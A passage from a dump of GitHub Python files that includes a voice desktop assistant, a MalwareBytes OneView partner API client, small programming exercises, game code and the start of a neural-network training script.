= sorted(set.union(set(self._unqualified_types), using_decls, using_ns))\n for node in fixups:\n start_byte = node.node.start_byte\n start_txt = self._tree.text[out_idx:start_byte].decode(\"utf8\")\n\n if node.node.type == \"using_declaration\":\n # Remove these nodes from the output text\n output += start_txt.encode(\"utf8\")\n out_idx = node.node.end_byte\n # Skip newline-like characters\n while chr(self._tree.text[out_idx]) in {\"\\n\", \"\\r\"}:\n out_idx += 1\n elif node.node.type in {\"type_identifier\", \"identifier\"}:\n end_txt = self._tree.text[node.node.start_byte : node.node.end_byte].decode(\"utf8\")\n out_idx = node.node.end_byte\n\n # Lookup namespace from existing 'using '\n ns = self._decl_ns_map.get(node.text, \"\")\n hard = self.hardcoded_namespace_map.get(node.text, None)\n if ns:\n # Insert into text\n output += f\"{start_txt}{ns}::{end_txt}\".encode()\n elif hard:\n # Maybe it's a hardcoded mapping (to handle 'using namespace ')\n output += f\"{start_txt}{hard}::{end_txt}\".encode()\n else:\n # print(f\"WARN: Could not find qualifier for type {node.text}\")\n output += f\"{start_txt}{end_txt}\".encode()\n else: # pragma: no cover\n print(f\"ERROR: Not processing unknown node type: {node.node.type}\")\n output += self._tree.text[out_idx:]\n\n self._did_fix = True\n\n return 
output\n","repo_name":"ekilmer/remusing_cpp","sub_path":"remusing_cpp/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"36025368618","text":"from random import shuffle, randrange\nfrom typing import List\n\nfrom game.interfaces.iplayer import IPlayer\n\nfrom game.implementations.players.player import Player\nfrom game.implementations.players.bear import Bear\n\nclass PlayersFactory:\n    def __init__(self, players_count: int, bears_count: int, labyrinth_size: int):\n        self.players_count = players_count\n        self.bears_count = bears_count\n        self.labyrinth_size = labyrinth_size\n\n    def create(self) -> List[IPlayer]:\n        players = []\n\n        for i in range(self.players_count):\n            player = Player(randrange(self.labyrinth_size), randrange(self.labyrinth_size), index=i)\n            players.append(player)\n\n        for i in range(self.bears_count):\n            bear = Bear(randrange(self.labyrinth_size), randrange(self.labyrinth_size), index=i)\n            players.append(bear)\n\n        return players\n\n    @staticmethod\n    def load(data, objects):\n        players = []\n        for playerData in data:\n            if playerData['class'] == \"Player\":\n                players.append(Player.load(playerData, objects))\n            if playerData['class'] == \"Bear\":\n                players.append(Bear.load(playerData))\n        return players\n\n    @staticmethod\n    def dump(players: List[IPlayer]):\n        data = []\n        for player in players:\n            playerData = player.dump()\n            playerData['class'] = type(player).__name__\n            \n            data.append(playerData)\n        return data\n","repo_name":"m-rodin/labyrinth_game","sub_path":"game/implementations/players/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39698719645","text":"import datetime\nimport os\nimport wikipedia\nimport pyttsx3\nimport speech_recognition as sr\nimport webbrowser\nimport smtplib\n\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# print(voices[1].id)\nengine.setProperty('voice', voices[1].id)\n\n\n\ndef speak(audio):\n    engine.say(audio)\n    engine.runAndWait()\n\ndef wishME():\n    hour = int(datetime.datetime.now().hour)\n    if hour >= 0 and hour < 12:\n        speak(\"Good Morning\")\n    elif hour >=12 and hour <15:\n        speak(\"Good Afternoon\")\n    elif hour >=15 and hour <19:\n        speak(\"Good Evening\")\n\n    speak(\"Hello, My name is Alexandra, Speed 1 terahertz, memory 1 zeta byte, version 1.0\")\n    speak(\"How may I help you today?\")\n    print(\"How may I help you today?\")\ndef takeCommand():\n    '''\n    Takes the user's voice command from the microphone and\n    returns the recognized text for the main loop to act on.\n    '''\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Listening...\")\n        r.pause_threshold = 1\n        audio = r.listen(source)\n    try:\n        print(\"Recognizing...\")\n        query = r.recognize_google(audio, language = 'en-in')\n        print(f\"User said: {query}\\\n\")\n    except Exception as e:\n        # print(e)\n        print(\"Pardon Sir, but can you repeat again, please...?\")\n        speak(\"Pardon Sir, but can you repeat again, please...?\")\n        return \"None\"\n    return query\ndef sendEmail(to, content):\n    server = smtplib.SMTP('smtp.gmail.com', 587)\n    server.ehlo()\n    server.starttls()\n    server.login('sender-email@gmail.com', 'your-email-password') # Put sender's email address and password here (Note: before sending, make sure Gmail's less-secure-app access is enabled)\n    
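# sendmail(from_addr, to_addrs, msg) sends the plain text as the message body\n    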
server.sendmail('sender-email@gmail.com', to, content)\n server.close()\n\nif __name__ == '__main__':\n wishME()\n while True:\n # if 1:\n query = takeCommand().lower()\n # Logic for executing tasks based on query\n if 'wikipedia' in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\", \"\")\n result = wikipedia.summary(query, sentences=2)\n speak(\"According to Wikipedia, \")\n print(result)\n speak(result)\n\n elif 'open youtube' in query:\n webbrowser.open(\"youtube.com\")\n elif 'open google' in query:\n webbrowser.open(\"google.com\")\n elif 'open linkedin' in query:\n webbrowser.open(\"linkedin.com\")\n elif 'open music' in query:\n music_dir = \"C:\\\\Users\\\\Omkar Tendolkar\\\\Music\"\n songs = os.listdir(music_dir)\n print(songs)\n os.startfile(os.path.join(music_dir, songs[0]))\n elif 'the time' in query:\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\"Sir the time is {strTime}\")\n elif 'open chrome' in query:\n codePath = \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\"\n os.startfile(codePath)\n elif 'email to omkar' in query:\n try:\n speak(\"What should i say?\")\n content = takeCommand()\n to = \"reciever-email@gmail.com\" #Put reciever email here for sending\n sendEmail(to, content)\n speak(\"Email has been sent!\")\n except Exception as e:\n print(e)\n speak(\"Sorry Omkar Sir, I was failed to sent your email\")\n elif 'you stop' in query:\n speak (\"Thank you for using me sir\")\n speak(\"Bye Bye\")\n break\n\n\n","repo_name":"Omkar-Tendolkar/Desktop-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30396309530","text":"from unittest import TestCase\n\nimport gender_converter\n\n\nclass Test(TestCase):\n def test_convert_gender_when_male(self):\n expected = \"MALE\"\n actual = gender_converter.convert_gender(\"M\")\n\n self.assertEqual(actual, expected)\n\n def test_convert_gender_when_female(self):\n expected = \"FEMALE\"\n actual = gender_converter.convert_gender(\"F\")\n\n self.assertEqual(actual, expected)\n","repo_name":"Riche3488/my-python-app","sub_path":"test_gender_converter.py","file_name":"test_gender_converter.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11541529308","text":"# program to check weather the digit of the number raise to its respective index \n#is equal to the sum of the digit or not\na=int(input(\"Please enter the number\"))\nnum=a\nlst=[i for i in str(num)]\nprint(lst)\nsum=0\nfor i in range(1,len(lst)+1):\n #print(i)\n #print(int(lst[i-1])**i)\n sum=sum+int(lst[i-1])**i\nif sum==a:\n print(\"yes\")\nelse:\n print(\"No\")\n\n","repo_name":"Anshuman366/DSA","sub_path":"AMCAT_qUESTIONS/QUES4.py","file_name":"QUES4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69962292281","text":"from __future__ import annotations\n\nimport json\nimport base64\nfrom abc import ABC\nfrom typing import Any, Optional, Tuple\nfrom datetime import date\n\nimport requests\nfrom requests import Response\nfrom malwarebytes.account.domain.contracts import AccountRepository, OneViewRepository\nfrom malwarebytes.account.infrastructure.exceptions import (\n AccountDataNotValidException, AccountExistingEmailException, 
AuthenticationException,\n ConnectionTimeoutException, ConnectionUnauthorizedException, LimitExceeded,\n MalwareBytesException, MalwareBytesServerException, MBClientException, SiteNotValidException,\n TrialSubscriptionNotValidException,\n)\nfrom malwarebytes.account.domain.models import (\n Account, AccountBilling, AccountCreated, AccountId, AccountToInject, Email, MSPAccount,\n)\nfrom malwarebytes.account.application.contracts import Logger\nfrom malwarebytes.account.infrastructure.logger import (\n formatter_api_request,\n formatter_api_response,\n)\n\nVALID_RESPONSE = 200\nACCOUNT_DATA_NOT_VALID = 400\nACCOUNT_DATA_ALREADY_EXIST = 409\nCONNECTION_UNAUTHORIZED = 401\nDATA_NOT_VALID = 500\n\nACCOUNT_CREDENTIALS = 'account_credentials'\nHEADERS_TYPE = 'application/json'\n\nNUMBER_ACCOUNT_PER_PAGE = 200\n\n\nclass APIClient:\n \"\"\"\n API Client to performs the API calls\n \"\"\"\n\n def __init__(\n self,\n mb_oauth_url: str,\n mb_oauth_client_id: str,\n mb_oauth_client_secret: str,\n mb_api_url: str,\n logger: Logger,\n max_retries: int = 3,\n ):\n \"\"\"\n Parameters\n ----------\n mb_oauth_url: str\n OAUTH URL.\n mb_oauth_client_id: str\n Client ID.\n mb_oauth_client_secret: str\n Client Secret.\n mb_api_url: str\n API URL used for send the requests\n logger: Logger\n\n \"\"\"\n self.logger = logger\n self.mb_oauth_url = mb_oauth_url\n self.mb_oauth_client_id = mb_oauth_client_id\n self.mb_oauth_client_secret = mb_oauth_client_secret\n self.host = mb_api_url\n self.max_retries = max_retries\n\n def send(\n self,\n method: str,\n path: str,\n query: Optional[dict] = None,\n body: Optional[dict] = None,\n ) -> Response:\n \"\"\"\n Sends a requests to MalwareBytes API.\n\n Parameters\n ----------\n method: str\n The HTTP method to use.\n\n path: str, None\n The path to the resource.\n\n query: dict, optional\n The parameters of the requests to be sent.\n\n body: dict, optional\n The body of the requests to be sent.\n\n Returns\n -------\n response: Response\n The response\n \"\"\"\n\n retries = 0\n success = False\n\n while retries < self.max_retries and not success:\n retries += 1\n try:\n token = self.get_token()\n headers = {\n 'Authorization': f\"Bearer {token}\",\n 'Content-Type': HEADERS_TYPE,\n 'Accept': HEADERS_TYPE,\n }\n self.logger.info(formatter_api_request(method, self.get_url(path), headers, body))\n\n try:\n response = requests.request(\n method,\n self.get_url(path),\n headers=headers,\n params=query,\n json=body,\n verify=True,\n timeout=(180, 540),\n )\n except ConnectionError as e:\n raise ConnectionTimeoutException(str(e))\n\n self.logger.debug(formatter_api_response(response))\n\n if response.status_code >= 500:\n raise _make_server_error(response)\n\n if response.status_code >= 400:\n raise _make_client_error(response)\n\n success = True\n return response.content\n except AuthenticationException as e:\n self.logger.warning(\"{error} with message {msg} retrying {retries}/{max}\".format(\n error=e.__class__.__name__,\n msg=e,\n retries=retries,\n max=self.max_retries,\n ))\n\n if retries == self.max_retries:\n raise\n\n def get_url(self, action_path: str):\n \"\"\"\n Creates the URL to the resource for the requests.\n\n Parameters\n ----------\n action_path: str\n The path to the resource. 
It should start with a slash.\n \"\"\"\n return f'{self.host}{action_path}'\n\n def get_token(self):\n \"\"\"\n Get Token.\n \"\"\"\n\n base64_str = base64.b64encode(\n bytes(self.mb_oauth_client_id + ':' + self.mb_oauth_client_secret, 'utf-8'),\n )\n base64_authorization = base64_str.decode('utf-8')\n\n token_url = self.mb_oauth_url + '/oauth2/token'\n payload = 'scope=oneview-partner&grant_type=client_credentials'\n headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Authorization': 'Basic ' + base64_authorization}\n\n response = requests.post(token_url, headers=headers, data=payload)\n\n if response.status_code == 200:\n token_data = json.loads(response.content)\n access_token = token_data[\"access_token\"]\n self.logger.debug(formatter_api_response(response))\n else:\n self.logger.error(f\"There was an error try to get Access Token. Error Code: \"\n f\"{response.status_code}\")\n raise AuthenticationException(\n f\"There was an error try to get Access Token. Error Code: {response.status_code} \"\n f\"Message: {response.reason}\")\n\n return access_token\n\n\nclass APIClientOneView:\n \"\"\"\n API Client of OneView\n \"\"\"\n\n def __init__(\n self,\n mb_oauth_url: str,\n mb_oauth_client_id: str,\n mb_oauth_client_secret: str,\n mb_api_url: str,\n logger: Logger,\n max_retries: int = 3,\n ):\n \"\"\"\n Parameters\n ----------\n mb_oauth_url: str\n OAUTH URL.\n mb_oauth_client_id: str\n Client ID.\n mb_oauth_client_secret: str\n Client Secret.\n mb_api_url: str\n API URL used for send the requests\n logger: Logger\n\n \"\"\"\n self.logger = logger\n self.mb_oauth_url = mb_oauth_url\n self.mb_oauth_client_id = mb_oauth_client_id\n self.mb_oauth_client_secret = mb_oauth_client_secret\n self.host = mb_api_url\n self.max_retries = max_retries\n\n def send(\n self,\n method: str,\n path: str,\n query: Optional[dict] = None,\n body: Optional[dict] = None,\n ) -> Response:\n \"\"\"\n Sends a requests to MalwareBytes Oneview API.\n\n Parameters\n ----------\n method: str\n The HTTP method to use.\n\n path: str, None\n The path to the resource.\n\n query: dict, optional\n The parameters of the requests to be sent.\n\n body: dict, optional\n The body of the requests to be sent.\n\n Returns\n -------\n response: Response\n The response\n \"\"\"\n\n retries = 0\n success = False\n\n while retries < self.max_retries and not success:\n retries += 1\n try:\n token = self.get_token()\n headers = {\n 'Authorization': f\"Bearer {token}\",\n 'Content-Type': HEADERS_TYPE,\n 'Accept': HEADERS_TYPE,\n }\n self.logger.info(formatter_api_request(method, self.get_url(path), headers, body))\n\n try:\n response = requests.request(\n method,\n self.get_url(path),\n headers=headers,\n params=query,\n json=body,\n verify=True,\n timeout=(180, 540),\n )\n except ConnectionError as e:\n raise ConnectionTimeoutException(str(e))\n\n self.logger.debug(formatter_api_response(response))\n\n if response.status_code >= 500:\n raise _make_server_error(response)\n\n if response.status_code >= 400:\n raise _make_client_error(response)\n\n success = True\n return response.content\n except AuthenticationException as e:\n self.logger.warning(\"{error} with message {msg} retrying {retries}/{max}\".format(\n error=e.__class__.__name__,\n msg=e,\n retries=retries,\n max=self.max_retries,\n ))\n\n if retries == self.max_retries:\n raise\n\n def get_url(self, action_path: str):\n \"\"\"\n Creates the URL to the resource for the requests.\n\n Parameters\n ----------\n action_path: str\n The path to the resource. 
It should start with a slash.\n \"\"\"\n return f'{self.host}{action_path}'\n\n def get_token(self):\n \"\"\"\n Get Token.\n \"\"\"\n\n base64_str = base64.b64encode(\n bytes(self.mb_oauth_client_id + ':' + self.mb_oauth_client_secret, 'utf-8'),\n )\n base64_authorization = base64_str.decode('utf-8')\n\n token_url = self.mb_oauth_url + '/oauth2/token'\n payload = 'scope=read write execute&grant_type=client_credentials'\n headers = {'Content-Type': 'application/x-www-form-urlencoded', # specific to my app\n 'Authorization': 'Basic ' + base64_authorization,\n }\n\n response = requests.post(token_url, headers=headers, data=payload)\n\n if response.status_code == 200:\n token_data = json.loads(response.content)\n access_token = token_data[\"access_token\"]\n self.logger.debug(formatter_api_response(response))\n else:\n self.logger.error(f\"There was an error try to get Access Token. Error Code: \"\n f\"{response.status_code}\")\n raise AuthenticationException(\n f\"There was an error try to get Access Token. Error Code: {response.status_code} \"\n f\"Message: {response.reason}\")\n\n return access_token\n\n\ndef _make_server_error(response: Response) -> MalwareBytesException:\n \"\"\"\n Makes a Server Error Exception (error >= 500)\n Parameters\n ----------\n response: Response\n Response from Zoom API\n Returns\n -------\n The MalwareBytesException.\n \"\"\"\n return MalwareBytesServerException(response.text, str(response.status_code), {\n 'response': response,\n })\n\n\ndef _make_client_error(response: Response) -> MalwareBytesException:\n \"\"\"\n Makes a Client Error Exception (400 <= error < 500)\n Parameters\n ----------\n response: Response\n Response from MalwareBytes API\n ReturnsF\n -------\n The MalwareBytesException.\n \"\"\"\n body = response.json()\n message = body.get(\"message\", response.reason)\n code = str(body.get(\"code\", str(response.status_code)))\n\n # Throttling limit is 360 calls per minute.\n # When the limit is reached the API server will respond with a 429 HTTP status code.\n if code in ['429']:\n return LimitExceeded(message, code)\n elif response.status_code == ACCOUNT_DATA_ALREADY_EXIST:\n return AccountExistingEmailException(message, code)\n elif response.status_code == CONNECTION_UNAUTHORIZED:\n return AuthenticationException(message, code)\n elif response.status_code == ACCOUNT_DATA_NOT_VALID:\n return AccountDataNotValidException(message, code)\n\n return MBClientException(message, code, {\n 'response': response,\n })\n\n\nclass OneviewRepository(OneViewRepository, ABC):\n def __init__(self, api_client_oneview: APIClientOneView, logger=None) -> None:\n self.api_client_oneview = api_client_oneview\n self.logger = logger\n\n def create_site(self, body) -> str | None:\n \"\"\"\n Create Site for MSP Account ID\n :param body:\n :return: str\n \"\"\"\n\n new_site = self.api_client_oneview.send(\"POST\", \"/oneview/v1/sites\", body=body)\n\n new_site_dict = json.loads(new_site)\n\n if new_site_dict.get(\"statusCode\"):\n if new_site_dict.get(\"statusCode\") != VALID_RESPONSE:\n self.logger.error(\n f\"It was not possible to create a site due to response of API return an error: \"\n f\"{new_site_dict['message']}\")\n raise SiteNotValidException(new_site_dict)\n\n if len(new_site_dict) == 0:\n return None\n\n self.logger.info(\n f\"New Site create for Account with ID {new_site_dict.get('id')}\")\n\n return new_site_dict.get('id')\n\n def create_trial_subscription(self, site_id, body):\n \"\"\"\n Create Trial Subscription for MSP Account ID\n :param site_id:\n :param 
body:\n \"\"\"\n\n response_orig = self.api_client_oneview.send(\n \"POST\", f\"/oneview/v2/sites/{site_id}/subscriptions\", body=body)\n\n response = json.loads(response_orig)[0]\n\n if response.get(\"statusCode\"):\n if response.get(\"statusCode\") != VALID_RESPONSE:\n self.logger.error(\n f\"It was not possible to create a trial subscription due to response of API \"\n f\"return an error: {response['message']}\")\n raise TrialSubscriptionNotValidException(response)\n\n self.logger.info(f\"New Trial Subscription created to site Id {site_id}\")\n\n\nclass MBAccountRepository(AccountRepository, ABC):\n def __init__(self, api_client: APIClient, logger=None) -> None:\n self.api_client = api_client\n self.logger = logger\n\n def find(self, email: Email) -> Optional[MSPAccount]:\n \"\"\"\n Search Email in Accounts MalwareBytes.\n :param email:\n :return: Optional[MSPAccount]\n \"\"\"\n\n page_number = 0\n while True:\n # Gets all accounts in MalwareBytes. Api not let us get account by Email.\n accounts_list = self.api_client.send(\n \"GET\", f\"/api/v2/partners/oneview/accounts?page={page_number}&\"\n f\"perPage={NUMBER_ACCOUNT_PER_PAGE}\")\n\n accounts_dict = json.loads(accounts_list)\n msp_accounts = accounts_dict['msp_accounts']\n page_number += 1\n\n for msp_account in msp_accounts:\n if email.value == msp_account.get('owner').get('email'):\n self.logger.info(f\"Account with Email {email.value} found.\")\n return msp_account\n\n if accounts_dict['total_count'] <= NUMBER_ACCOUNT_PER_PAGE or len(msp_accounts) < 1:\n break\n\n self.logger.info(f\"Account with Email {email.value} does not exist\")\n return None\n\n def update(self, account: AccountToInject) -> AccountToInject | AccountCreated:\n \"\"\"\n Return existing account or create a new Account in MalwareBytes.\n :param account:\n :return: MSPAccount\n \"\"\"\n email = Email(account[\"contact\"][\"contact_email\"])\n\n mb_account = self.find(email)\n if mb_account:\n return account\n\n new_account = self._create_account(account)\n return new_account\n\n def get_credentials(\n self, msp_account_id: AccountId, msp_user_id: AccountId) -> Tuple[Any, Any] | None:\n \"\"\"\n Get Credentials for MSP Account ID\n :param msp_account_id:\n :param msp_user_id:\n :return: Tuple[str, str]\n \"\"\"\n\n body = {\n \"client_name\": \"sit magna\",\n \"access\": [\n \"read\",\n \"write\",\n \"execute\",\n ],\n }\n\n credentials = self.api_client.send(\n \"POST\", f\"/api/v2/partners/oneview/credentials/{msp_account_id}/{msp_user_id}\",\n body=body)\n\n credentials_dict = json.loads(credentials)\n\n if len(credentials_dict) == 0:\n return None\n\n self.logger.info(f\"Get Credentials for Account with ID {credentials_dict}\")\n return credentials_dict.get('client_id'), credentials_dict.get('client_secret')\n\n def _create_account(self, account: Account) -> AccountCreated:\n \"\"\"\n Creates a new Account in MalwareBytes\n\n Parameters\n ----------\n account: Account\n The Account to create in MalwareBytes\n\n return: MSPAccount\n The Account created in MalwareBytes\n \"\"\"\n\n response = self.api_client.send(\"POST\", \"/api/v2/partners/oneview/accounts\", body=account)\n\n '''\n statusCode= 400; error= Bad Request\n statusCode= 401; error= Unauthorized\n statusCode= 409; error= Conflict; message= \"Email already in use in Malwarebytes\"\n '''\n response = json.loads(response)\n\n if response.get(\"statusCode\"):\n if response.get(\"statusCode\") == ACCOUNT_DATA_NOT_VALID:\n self.logger.error(\n f\"It was not possible to create the Account 
{response['message']}\")\n raise AccountDataNotValidException(response)\n elif response.get(\"statusCode\") == ACCOUNT_DATA_ALREADY_EXIST:\n self.logger.error(\n f'Account with Email {account[\"contact\"][\"contact_email\"]} already '\n f'exists')\n raise AccountExistingEmailException(response['message'])\n elif response[\"statusCode\"] == CONNECTION_UNAUTHORIZED:\n self.logger.error(\n 'It was not possible to connect API MalwareBytes, please review your '\n 'credentials.')\n raise ConnectionUnauthorizedException(response['message'])\n\n return response\n\n def find_msp_account_id(self, msp_account_id: AccountId) -> Optional[MSPAccount]:\n \"\"\"\n Search if exist MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: Optional[MSPAccount]\n \"\"\"\n\n # Get account with this msp_account_id\n account = self.api_client.send(\n \"GET\", f\"/api/v2/partners/oneview/accounts?msp_ids={msp_account_id}\")\n\n accounts_dict = json.loads(account)\n msp_account = accounts_dict['msp_accounts']\n\n if not msp_account:\n return None\n\n self.logger.info(\"MSP Account ID found.\")\n return msp_account[0]\n\n def change(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Changed MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Change account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/convert\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Unable to perform Change Account having MSP Account ID \"\n f\"{msp_account_id.value} due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Changed.\")\n return True\n\n def cancel(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Cancel MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Cancel account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/terminate\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed cancellation due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was cancelled.\")\n return True\n\n def suspend(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Suspend MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Suspend account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/suspend\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed suspend due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Suspended.\")\n return True\n\n def resume(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Resume MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Resume account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/reactivate\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed reactivation due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Reactivated.\")\n return True\n\n def send_email(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Send Invite Email.\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Send invite Email account with this 
msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/resend\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed send invite email due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Email sent to MSP Account ID {msp_account_id.value}.\")\n return True\n\n def get_usage(\n self, msp_account_id: AccountId, star_date: date, end_date: date) -> AccountBilling:\n \"\"\"\n Get usage per Account\n :param msp_account_id:\n :param star_date:\n :param end_date:\n :return:\n \"\"\"\n try:\n body = {\n \"start_date\": star_date.strftime('%Y-%m-%d'),\n \"end_date\": end_date.strftime('%Y-%m-%d'),\n \"msp_ids\": [\n msp_account_id,\n ],\n }\n\n # Get usage of items to this msp_account_id\n usages = self.api_client.send(\n \"POST\", \"/api/v2/partners/oneview/usage/logs/summary\",\n body=body)\n\n usages_dict = json.loads(usages)\n\n usage = self._manage_usage(usages_dict)\n\n except MBClientException as ex:\n self.logger.error(f\"Failed get usage due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Usage got to MSP Account ID {msp_account_id}.\")\n\n return usage\n\n def _manage_usage(self, usages):\n\n items = {}\n for usage in usages:\n line_usage = usages.get(usage)\n for product_id, line_product in line_usage.items():\n if items.get(product_id):\n item = items[product_id]\n item['usage'] = item.get('usage') + line_product.get('usage')\n else:\n items[product_id] = line_product\n\n return items\n","repo_name":"cloudblue/processor-malwarebytes","sub_path":"malwarebytes/account/infrastructure/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":23845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27933768012","text":"# Write a program to find all pairs of an integer array whose sum is equal to a given number?\r\ndef find_pairs(arr, target):\r\n pairs = []\r\n seen = set()\r\n\r\n for num in arr:\r\n complement = target - num\r\n if complement in seen:\r\n pair = (min(num, complement), max(num, complement))\r\n pairs.append(pair)\r\n seen.add(num)\r\n\r\n return pairs\r\n\r\n# Example usage\r\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\ntarget_sum = 9\r\n\r\nresult = find_pairs(nums, target_sum)\r\nprint(f\"Pairs that sum up to {target_sum}:\")\r\nfor pair in result:\r\n print(pair)\r\n","repo_name":"prajaktasawan/Assignment_1-Linear-data-structure","sub_path":"Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10905279842","text":"#!/usr/bin/env python3\n\"\"\" Brute-force solution\nEvident\n(This is evident for python and other environment which supports big integer)\n\"\"\"\n\nfrom math import pow\n\nREQUEST = 1000\n\nif __name__ == '__main__':\n number = int(pow(2, REQUEST))\n digits = str(number)\n digits = [int(i) for i in digits]\n answer = sum(digits)\n print(answer)\n","repo_name":"JSYoo5B/TIL","sub_path":"PS/ProjectEuler/P016/bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16845192426","text":"from adventofcode2022 import read_file\n\n\ndef parse_file(file_content) -> list:\n rows = file_content.split(\"\\n\")\n rows = [[int(ele) for ele in _row] for _row in rows]\n return rows\n\n\ndef check_edge(coor: tuple, shape: tuple) -> bool:\n if 0 in coor or coor[0] == 
shape[0] - 1 or coor[1] == shape[1] - 1:\n return True\n else:\n return False\n\n\ndef check_visible(look_out: list) -> bool:\n # trees are visible to the edge of map\n visibility = [look_out[0] > ele for ele in look_out[1:]]\n return all(visibility)\n\n\ndef count_visible_trees(look_out: list) -> int:\n tree, remaining = look_out[0], look_out[1:]\n count = 0\n\n for ele in remaining:\n count += 1\n if ele >= tree:\n break\n return count\n\n\ndef count_visible(tree_map: list[list]) -> tuple:\n shape = (len(tree_map), len(tree_map[0]))\n count_visible, scenic_scores = 0, []\n\n for i in range(shape[0]):\n for j in range(shape[1]):\n if check_edge((i, j), shape):\n count_visible += 1\n else:\n up = [row[j] for row in tree_map[: i + 1]][::-1]\n down = [row[j] for row in tree_map[i:]]\n left = tree_map[i][: j + 1][::-1]\n right = tree_map[i][j:]\n\n up_visible = check_visible(up)\n down_visible = check_visible(down)\n left_visible = check_visible(left)\n right_visible = check_visible(right)\n\n if any([up_visible, down_visible, left_visible, right_visible]):\n count_visible += 1\n\n up_score = count_visible_trees(up)\n down_score = count_visible_trees(down)\n left_score = count_visible_trees(left)\n right_score = count_visible_trees(right)\n scenic_scores.append(up_score * down_score * left_score * right_score)\n\n return count_visible, max(scenic_scores)\n\n\nFILE_PATH = \"./input/day08.csv\"\ntree_map = parse_file(read_file(FILE_PATH))\nprint(count_visible(tree_map))\n","repo_name":"johnhendrick/adventofcode2022","sub_path":"adventofcode2022/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26182532280","text":"\"\"\"By running this code, four Neural networks are trained and saved: two for estimating forward and backward end-points\n for each discrete state-input pairs; and two for estimating forward and backward growth bounds with respect\nto discrete inputs.\"\"\"\nimport os\nimport numpy as np\nimport math\nimport time\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\nimport env_pool\n#import levenberg_marquardt as lm\n\ndef discrete_sys_size_gen(x_range):\n \"\"\" This function computes a vector that contains number of\n discrete states for every dimension of state and input spaces.\"\"\"\n discrete_sys_size = np.zeros(dim_x + dim_u)\n for ii in range(0, dim_x):\n discrete_sys_size[ii] = math.floor((x_range[ii, 1] - x_range[ii, 0] - eta_x[ii]) / eta_x[ii] + 1)\n for ii in range(dim_x, dim_x + dim_u):\n discrete_sys_size[ii] = math.floor(\n (U_range[ii - dim_x, 1] - U_range[ii - dim_x, 0] - eta_u[ii - dim_x]) / eta_u[ii - dim_x] + 1)\n return discrete_sys_size.astype(int)\n\n\ndef NN_structure_TS():\n \"\"\"Create the model for estimating the transition system.\"\"\"\n model = Sequential()\n model.add(Dense(40, input_dim=dim_x+dim_u, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, 